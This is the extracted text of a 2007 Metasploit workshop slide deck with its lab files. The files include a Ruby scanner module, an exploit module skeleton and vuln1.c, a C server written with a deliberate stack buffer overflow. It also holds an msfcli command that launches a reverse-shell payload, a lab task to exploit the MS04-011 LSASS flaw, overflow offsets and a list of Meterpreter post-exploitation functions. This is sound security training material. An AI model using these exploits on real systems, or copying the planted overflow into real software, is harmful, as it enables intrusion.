metasploit basics
DESCRIPTION
TRANSCRIPT
EXPLOITATION FRAMEWORKS: THE METASPLOIT WORKSHOP
Exploitation Frameworks: Metasploit 3.x WorkshopSteven McGrath
What to Accomplish
Understanding Metasploit as a user
Understanding the basics of Ruby
Understanding Metasploit as a developer
Understanding Metasploit as a expert
What this is...
To help better an understanding of Metasploit
To learn how to use the framework in exploit research
To learn how to use Metasploit in pen-testing.
1
2
3
What this is NOT...
l33t h@x0r class
Reasons why Metasploit is better than everything else...it isn’t
h@x0ring this network.
You should have...
Backtrack Image (supplied)
VMWare Player/Workstation/Fusion (supplied)
A laptop to run all of this on (NOT supplied)
Starting off
What is Metasploit?
How is it used?
What are other tools?
What benefits does Metasploit have?
4
5
6
What is it?
Metasploit is an exploitation framework, NOT a vulnerability scanner.
How is it used?
Primarily an aide in exploitation research.
Secondarily used in pen-testing.
What are other tools?
CORE Impact
CANVAS
7
8
9
Benefits?
Price
CORE Impact = $25,000 USD a year
CANVAS = $1244 USD + Support
Flexibility
Open Source = More Options
Downsides?
Flexibility
Most Metasploit payloads are windows specific.
Completeness
The framework is under active development, however there are still holes in the framework that need to be addressed.
Metasploit as a User
10
11
12
What to cover?
Control Interfaces
Basic usage
msfconsole
Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable
msfconsole
Automation?
Automation is achieved through resource files. They contain a list of commands that msfconsole should run as if the user had inputted them and startup of the console.
13
14
15
msfconsole
Configuration files?
msfconsole by default has the ability to store per-user configuration data. This is typically stored in ~/.msf3 by default.
msfconsole
Basic Commands:
set unsetload unloaduse showsave sessionsjobs routeinfo irb
loadpath backcheck exploit
run route
msfconsole - set/unset
set - Sets a variable to the specified value. Also can show a list of variables that can be set when run alone.
unset - Will “unset” or remove the value from a variable or series of variables.
setg - Global equivilent of set.
unsetg - Global equinilent of unset.
NOTE: local variables will override globals.
16
17
18
msfconsole - load/unload
load - Will load a plugin from the framework. You can also pass values to optional variables at load.
unload - Will unload a plugin.
loadpath - Adds a module path for the framework to search and load modules. Useful for custom modules.
msfconsole - show/use
show - Will display lists of modules: auxilary, exploits, payloads, encoders, and nops.
use - Use changes your context within the framework.
back - Returns you to the global context.
msfconsole - save
save - Saves your current state (e.g. current module and set variables)
19
20
21
msfconsole - sessions
sessions - Session interations...
-i - Interacts with the specified session.
-l - Lists the active sessions.
msfconsole - jobs
jobs - Will display information in reguards to backgrounded jobs (typically client-side exploits)
-l - List the active jobs.
-k - Kills the specified job.
msfconsole - route
route - Allows you to interact with the framework routing table (useful in “pivoting”).
22
23
24
msfconsole - info
info - Will display information about the specified module(s).
msfconsole - irb
irb - Provides an interactive ruby shell into the framework. This is useful for live scripting and/or modification to code.
msfconsole - check/exploit
check - Checks to see if the specified target is vulnerable to an exploit.
exploit - Will launch an exploit on the specified target.
run - Will launch an auxiliary module against the specified target(s).
NOTE: Normally checks are not required to exploit a target.
25
26
27
msfconsole - rcheck/rexploit
rcheck - Will first reload the module from disk before running the check.
rexploit - Same as rcheck, but will launch the actual exploit.
msfcli
Commandline Interface
Arguments are passed to tell Metasploit what to do
Traditionally used for automation
msfcli
Example:
./msfcli exploit/example \ RHOST=192.168.1.100 \ LHOST=192.168.1.50 \ PAYLOAD=windows/shell/reverse_tcp E
28
29
30
msfcli
./msfcli -h for more info
msfweb
Web Interface to Metasploit
Ruby on Rails application
The primary interface for Windows
31
32
33
msfgui
Still under HEAVY development
GTK GUI to Metasploit
Attempt to make Metasploit more like CANVAS and CORE from the User’s standpoint
msfd
Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the hassle of screen.
Pivot points
Exploits
Sessions
34
35
36
Before we continue...
From this point on we will be assuming msfconsole
Exploit Me!
Target: 10.0.0.5
Exploit Module to use: windows/smb/ms04_011_lsass
Payload: Anything you choose!
Feel free to ask your classmates and myself :)
Metasploit as a Developer
37
38
39
Metasploit as a Developer
This will be a hands-on workshop.
You WILL be writing your own exploit before we leave.
Due to constraints, we will be focusing viewing a few example modules for code examples before the workshop portion.
Starting off...
Getting to know Ruby
A general understanding of how Metasploit 3.x is built
Example Code
Lab
Getting to know Ruby
Interpreted, not compiled.
Object Oriented by design
The Red-headed stepchild of Python, Perl, and SmallTalk
40
41
42
Getting to know Ruby
Hello World:
#!/usr/bin/env ruby
# This is the hello world Application
var1="Hello World!"print "\n#{var1}\n"print var1, "\n"
Getting to know Ruby - Lab
Extend the Basic TCP Server in your materials to respond to any input given.
Getting to know Ruby - Lab
require 'socket'port = 44455host = localhostserver = TCPServer.new(host,port)while(session = server.accept) while !session.eof? session.puts "R: #{session.gets}" endend
43
44
45
Metasploit’s Structure - Dirsdata - Data files for the framework
documentation - Examples, Guides, etc.
external - Non-framework software
lib - Framework Libraries
modules - Module root for the framework
plugins - Plugin root for the framework
scripts - Script root for the framework
tools - Development tools
Metasploit’s Structure - Dirs
modules
auxiliary - Auxiliary module root
encoders - Encoder module root
exploits - Exploit module root
nops - NOP module root
payloads - Payload module root
Metasploit’s Structure
What is the difference between an exploit and an auxiliary module?
Exploit modules will actually deliver a payload
Auxiliary modules cover anything else
46
47
48
Metasploit’s Structure
Rex
Ruby Exploitation Library
Derived from Metasploit 2’s Pex libraries
Located in lib/rex
Rex is the base that most of the framework builds upon
Rex SubsystemsArchitectures Encoding Exploitation
I/O Logging Nops
Non-Protocol Parsers
Payload Polymorphic Blocks
Post-Exploit Clients
Protocols Services
Services Sockets Text Manipulation
User Interface
49
50
51
Framework Core
Core interface into the framework
Handles the core aspects of the framework
Module interaction (loading, unloading, etc.)
Exploitation handling
Plugins
Sessions
Located under lib/msf/core
Framework Core Classes
Framework Datastore EncodedPayload
ModuleAuxiliaryEncoderExploitNopPayload
EventDispatcher ExploitDriver
Handler OptionContainer
Plugin Session
Framework Base
Thin interaction layer between Framework Core and Modules, Plugins, and User Interfaces
52
53
54
Digging In...
Now that we have a basic understanding of how the framework is built, it’s time to dig into the plugins and modules themselves...
Metasploit Plugins
Plugins extend the framework dynamically.
Plugins are NOT modules.
All of the User Interfaces are essentially plugins to the framework.
Metasploit Plugins
Example Plugins
msfdDatabase support
Threading
Session hooks
Session taggers
IPS filters
55
56
57
Metasploit Pluginsmodule Msfclass Plugin::Example < Msf::Plugin module ExampleExtension def example_ext "This is a Test" end end def initialize(framework, options) framework.extend(ExampleExtension) endendend
Framework Modules
Modules are used for specific uses within the framework.
Modules use an extensible, well-defined interface for interaction within the framework.
All modules inherit from Msf::Module.
Metasploit Modules
Name String
Description String
Version String
Author Array
Arch Array
Platform PlatformList
Ref Array
License String
Common Hash Keys
58
59
60
Example Modulerequire 'msf/core'module Msfclass Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary include Exploit::Remote::Tcp include Auxiliary::Scanner def initialize super( 'Name' => 'HTTP Scanner', 'Author' => 'Maniac <[email protected]>', 'Description' => %q{Scans for HTTP Servers in RHOSTS.} ) register_options( [ Opt::RPORT(80), OptString.new("SENDSTRING", [ false,
"String to send if port is open", "HEAD / HTTP/1.0\n\n" ]) ], self.class ) end
Example Module def run_host(ip) connect sock.put(datastore['SENDSTRING']) data = sock.get_once print_status(ip + "\nReceived: " + data + "\n")
disconnect end endend
Framework Modules - Lab
Use the Lab module template and extend it to buffer overflow with the following information
Host: 10.0.0.5
Return: 0xbfbfed20
76 Bytes + [target.ret].pack('V') + payload.encode
61
62
63
Metasploit as an Expert
Tasty Good Stuff!
Automation
Metaterpreter
Attack Automation
64
65
66
Attack Automation
Attack automation can happen in a number of different ways:
Psudo-Automated
Full Automation
Psudo-Automation
Resource Files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
db_autopwn
Existing Nessus Data
Existing Nmap Data
Full Automation
db_autopwn
db_nmap - Will scan a network with nmap and then exploit based on what it put into the database.
67
68
69
Metaterpreter
Metaterpreter
Extensible - extensions can be written to enhance metaterpreter.
Powerful - Flexible protocol and channelized communication.
Stealthy - No disk access and no new process.
In Memory DLL injection
Metaterpreter - OMGWTF!This is how it works:
1.Metasploit sends first stage payload.
2.Payload talks back to Metasploit.
3.Metasploit sends second stage containing a DLL injection payload.
4.Metasploit sends the metaterpreter server DLL
5.DLL injection payload loads the server DLL in memory
6.Metaterpreter client and server communicate over the establiched channels.
70
71
72
Metaterpreter - UI
client.ui
Method Description
disable_keyboard Disables the Keyboard
disable_mouse Disables the Mouse
enable_keyboard Enables the Keyboard
enable_mouse Enables the Mouse
idle_time Returns idle time in seconds
Metaterpreter - Filesystem
client.fs.dirMethod Description
chdir(path) Change Directoriesdelete(path) Delete Directorydownload(dst, src, resursive Download Content to Localentries(path) Show Contents of Directorygetwd Get the Working Directorymkdir(path) Make Directoryupload(dst, src, recursive) Upload Content to Host
Metaterpreter - Filesystem
client.fs.file
Method Description
download(dest, files) Downloads Files to Local
expand_path(path) Expands Env Strings in Path
stat(path) Returns info on file
upload(dest, files) Uploads Files to Remote
73
74
75
Metaterpreter - Filesystem
client.fs.file.new
Method Description
(file, [r,w]) Opens file
close Closes file
read(length) Reads X bytes from file
seek(offset, whence) Seeks to offset in file
write(buffer) Writes buffer to the file
Metaterpreter - Networking
client.net.config
Method Description
add_route(s, n, g) Adds route
each_interface Displays interfaces
each_route Displays routes
get_interfaces Returns array of interfaces
get_routes Returns array of routing table
remove_route(s, n, g) Removes route
Metaterpreter - Config
client.sys.config
Method Description
getuid Returns Process UID
revert_to_self Calls RevertToSelf
sysinfo Returns System Name and Host Information
76
77
78
Metaterpreter - Power
client.sys.power
Method Description
reboot(reason) Reboots Host
shutdown(force, reason) Shuts down Host
Metaterpreter - Processes
client.sys.process
Method Description
each_process Displays running processes
execute(path, args, opts) Executes binary
getpid Returns current process
kill(pid) Kills process
processes Returns array of processes
open(pid, perms) Opens process
Metaterpreter - Registry
client.sys.registryMethod Description
close_key(hk) Closes an open keycreate_key(hk, bk, perm) Creates new keydelete_key(hk, bk, recursive) Deletes keydelete_value(hk, name) Deletes reg valueenum_key(hk) Returns array of subkeysopen_key(hk, bk, perm) Opens a reg keyquery_value(hk, name) Returns reg value
set_value(hk, name, type, val) Sets reg value
79
80
81
Metaterpreter - Memory
process.memoryMethod Description
allocate(len, prot, base) Allocates memoryfree(base, len) Deallocates memorylock(base, len) Lock pages in memoryprotect(base, len, prot) Changes page protectorsquery(base) Queries info on an addressread(base, len) Reads memorywrite(base, len) Writes memory
Metaterpreter - Threads
process.thread
Method Description
create(entry, param) Creates a new thread
each_thread Displays running threads
get_threads Returns array of threads
Metaterpreter - Images
process.image
Method Description
each_image Displays loaded images
get_images Returns array of images
get_procedure_address(b, n) Gets address of proceedure
load(path) Loads DLL
unload(base) Unloads DLL
82
83
84
Q&A
85
maniac_scanner.rb 2007-09-04
- 1/2 -
require 'msf/core'
module Msf
class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary
# Exploit mixins should be added first include Exploit::Remote::Tcp # Scanner mixin should be included last include Auxiliary::Scanner
def initialize super( 'Name' => 'Generic Scanner Template', 'Author' => 'Maniac <[email protected]>', 'Description' => %q{ Connect to every host specified in the RHOSTS network range, send a probe, read a response, and print that response to the screen. } ) register_options( [ # Specify the predefined RPORT option Opt::RPORT(25), # Specify a new option containing the string to send to the server OptString.new("SENDSTRING", [ false, "The string to send", "HEAD /HTTP/1.0\n\n" ]) ], self.class ) end
# Work with a single IP address at a time def run_host(ip) # Call the connect() method provided by the TCP mixin # This is equivalent to connect() connect
maniac_scanner.rb 2007-09-04
- 2/2 -
) register_options( [ # Specify the predefined RPORT option Opt::RPORT(25), # Specify a new option containing the string to send to the server OptString.new("SENDSTRING", [ false, "The string to send", "HEAD /HTTP/1.0\n\n" ]) ], self.class ) end
# Work with a single IP address at a time def run_host(ip) # Call the connect() method provided by the TCP mixin # This is equivalent to connect() connect
sock.put(datastore['SENDSTRING']) data = sock.get_once print_status(ip + " Received: " + data) # Call the disconnect() method provided by the TCP mixin # This is equivalent to disconnect() disconnect end endend
2007-09-05
- 1/1 -
#!/usr/bin/env ruby
##### Example TCP Server Lab ###### In this lab you will be modifying the# code to return any input to the client.
require 'socket'
# Lets define the port and host.port = 44455host = localhost
# Create a new server connection.server = TCPServer.new(host,port)
# Lets stay active as long as we are# accepting connections.while(session = server.accept)
# As long as we do not terminate # our client, lets stay within this # context. while !session.eof?
# Something should go here ;)
endend
example.rb 2007-09-04
- 1/2 -
require 'msf/core'
module Msf
class Exploits::Linux::Example < Msf::Exploit::Remote include Exploit::Remote::Tcp
def initialize(info = {}) super(update_info(info, 'Name' => 'Example Buffer Overflow Exploit', 'Description' => %q{ }, 'Author' => [ 'Maniac' ], 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, 'Version' => '$Revision: 4961 $', 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 200, 'StackAdjustment' => -3500, }, 'Platform' => 'linux', 'Targets' => [ [ 'linux', { 'Ret' => 0xbfbfec80 } ], ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5432), ], self.class) end
example.rb 2007-09-04
- 2/2 -
{ 'Space' => 200, 'StackAdjustment' => -3500, }, 'Platform' => 'linux', 'Targets' => [ [ 'linux', { 'Ret' => 0xbfbfec80 } ], ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5432), ], self.class) end
def exploit connect buf = pattern_create(2000) sock.put(buf) handler disconnect end
endend
© 2006 [email protected] — available free from www.cenophobie.com/ruby
Predefined Variables
$! Exception information
$@ Array of backtrace
$& String of last match
$` String left of last match
$‘ Str right of last match
$+ Last group of last match
$N Nth group of last match
$~ Info about last match
$= Case insensitive flag
$/ Input record separator
$\ Output record separator
$, Output field separator
$. Line number of last file
$> Default output
$_ Last input line of string
$* Command line args
$0 Name of script
$$ Process number
$“ Module names loaded
$stderr Standard error output
$stdin Standard input
$stdout Standard output
Reserved Words
alias
and
BEGIN
begin
break
case
class
def
defined?
do
else
elsif
END
end
ensure
false
for
if
in
module
next
nil
not
or
redo
rescue
retry
return
self
super
then
true
undef
unless
until
when
while
yield
Types
12345
123.45
1.23e-4
0xFF00
0b01100
1..5
1...5
‚a‘..‘z‘
‚a‘...‘z‘
‚string sq‘
„string dq“
„#{expr}“
„\t\r\n“
%q(string sq)
%Q(string dq)
%(string dq)
<<id string id
:symbol
/regex/opt
%r|regex|
[1, 2, 3]
%w(1 2 3)
%W(1 2 #{expr})
{1=>2, :s=>‘v‘}
Expressions
if expr [then] elsif expr [then]elseend
unless expr [then] elseend
expr if expr
expr unless expr
case exprwhen compelseend
while expr [do]end
until expr [do]end
dowhile expr
dountil expr
for var in expr [do]end
expr.each [do]end
break next redo retry
Module/Class
module Nameend
class Nameend
class Name < Supend
class << objend
def name(args...)end
def inst.name(...)end
publicprotectedprivate
attr_readerattr_writerattrattr_accessor
alias new old
Operators and Precedence
::
[]
**
+ - ! ~
* / %
<< >>
&
| ^
> >= < <=
<=> == === != =~
&&
.. ...
= ( += -= )
not
and or
Regex
. all characters
[ ] any single char in set
[^ ] any single char not in set
* zero or more
+ one or more
? zero or one
| alteration
( ) Group
^ Beginning of line or str
$ End of line or string
{1,5} 1 to 5
\A Beginning of a string
\b Word boundary
\B Non-word boundary
\d digit, same as [0..9]
\D Non-digit
\s Whitespace
\S Non-whitespace
\w Word-character
\W Non-word-character
\z End of a string
\Z End of string, before nl
Variables
local
@instance
@@class
CONSTANT
Constants
__FILE__
__LINE__
ENV
ARGF
ARGV
Exceptions
beginrescue ex => varelseensureend
StandardError
ZeroDivisi-onError
RangeError
SecurityError
IOError
IndexError
RuntimeError
Ruby arguments
-c Check
-d Debug
-e One Line
-h Help
-n gets loop
-rL require L
-v verbose
-w warnings
-y comp debug
© 2006 [email protected] — available free from www.cenophobie.com/ruby
String
Str#[num, num/range/regx] -> str
Str#capitalize! -> string
Str#center (int [,str]) -> str
Str#chomp! ([str]) -> str
Str#count -> integer
Str#delete! ([string]) -> string
Str#downcase! -> string
Str#each ([str]) do |str| ... end
Str#each_line do |line| ... end
Str#gsub! (rgx) do |match| ... end
Str#include? (str) -> true / false
Str#index (str/reg [,off]) -> int
Str#insert (int, string) -> string
Str#length -> integer
Str#ljust (int [,padstr]) -> str
Str#rindex (str/reg [,off]) -> int
Str#rjust (int [,padstr]) -> str
Str#scan (rgx) do |match| ... end
Str#split (string) -> array
Str#strip! -> string
Str#sub! (rgx) do |match| ... end
Str#swapcase! -> string
Str#to_sym -> symbol
Str#tr! (string, string) -> string
Str#upcase! -> string
File
File#new (path, modestring)-> file
File#new (path, modestring) do |file| ... end
File#open (path, modestring) do |file| ... end
File#exist? (path) -> t or f
File#basename (path [,suffix]) -> string
File#delete (path, ...)
File#rename (old, new)
File#size (path) -> integer
r Read-only, from beginning
r+ Read-write, from beginning
w Write-only, trunc. / new
w+ Read-write, trunc. / new
a Write-only, from end / new
a+ Read-write, from end / new
b Binary (Windows only)
Array
Array::new (int [,obj]) -> array
Array#clear
Array#map! do |x| ... end
Array#delete (value) -> obj or nil
Array#delete_at (index)-> obj or n
Array#delete_if do |x| ... end
Array#each do |x| ... end
Array#flatten! -> array
Array#include? (value) -> t or f
Array#insert (idx, obj...)-> array
Array#join ([string]) -> string
Array#length -> integer
Array#pop -> obj or nil
Array#push (obj...) -> array
Object
Obj#class -> class
Obj#freeze -> object
Obj#frozen? -> true or false
Obj#inspect -> string
Obj#is_a? (class) -> true or false
Obj#methods -> array
Obj#respond_to? (sym) -> true or false
Obj#to_s -> string
Dir
Dir[string] -> array
Dir::chdir ([string])
Dir::delete (string)
Dir::entries (string) -> array
Dir::foreach (string) do |file| ... end
Dir::getwd -> string
Dir::mkdir (string)
Dir::new (string)
Dir::open (string) do |dir| .. end
Dir#close
Dir#pos -> integer
Dir#read -> string or nil
Dir#rewind
Hash
Hash#clear
Hash#delete (key) -> obj or nil
Hash#delete_if do |k, v| ... end
Hash#each do |k, v| ... end
Hash#has_key? (k) -> true or false
Hash#has_value? (v) -> t or f
Hash#index (value) -> key
Hash#keys -> array
Hash#length -> integer
Hash#select do |k, v| ... end -> array
Hash#values -> array
Test::Unit
assert (boolean [,msg])
assert_block (message) do ... end
assert_equal (expected, actual [,msg])
assert_in_delta (exp, act, dlt [,message])
assert_kind_of (klass, object [,msg])
assert_match (pattern, string [,msg])
assert_nil (object [,msg])
assert_no_match (pattern, string [,msg])
assert_not_equal (expected, actual [,msg])
assert_not_nil (object [,msg])
assert_not_same (expected, actual [,msg])
assert_respond_to(obj, method [,msg])
assert_same (expected, actual [,msg])
DateTime
DateTime::now
DateTime::parse (str)
DateTime::strptime (str, format)
DateTime#day
DateTime#hour
DateTime#leap?
DateTime#min
DateTime#month
DateTime#sec
DateTime#wday
DateTime#year
Kernel
block_given?
eval (str [,binding])
raise (exception [,string])
fork do ... end => fixnum or nil
proc do ... end => proc
print (obj)
warn (msg)
Ruby: www.ruby-lang.orgDoc: www.ruby-doc.org
vuln1.c 2007-09-04
- 1/2 -
#include <stdio.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>
#define LISTEN_PORT 5432
int main() { char buf[64];
int sock; int peersock; struct sockaddr_in my_addr; int reuse = 1;
if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); return(1); }
if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) { perror("setsockopt"); return(1); }
memset(&my_addr, 0, sizeof(my_addr)); my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTEN_PORT); if(bind(sock, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) { perror("bind"); return(1); }
if(listen(sock, 5) == -1) { perror("listen"); return(1); }
if((peersock = accept(sock, NULL, 0)) == -1) { perror("accept"); return(1); }
vuln1.c 2007-09-04
- 2/2 -
perror("setsockopt"); return(1); }
memset(&my_addr, 0, sizeof(my_addr)); my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTEN_PORT); if(bind(sock, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) { perror("bind"); return(1); }
if(listen(sock, 5) == -1) { perror("listen"); return(1); }
if((peersock = accept(sock, NULL, 0)) == -1) { perror("accept"); return(1); }
if(read(peersock, buf, 4096) == -1) { perror("read"); return(1); }
return(0);}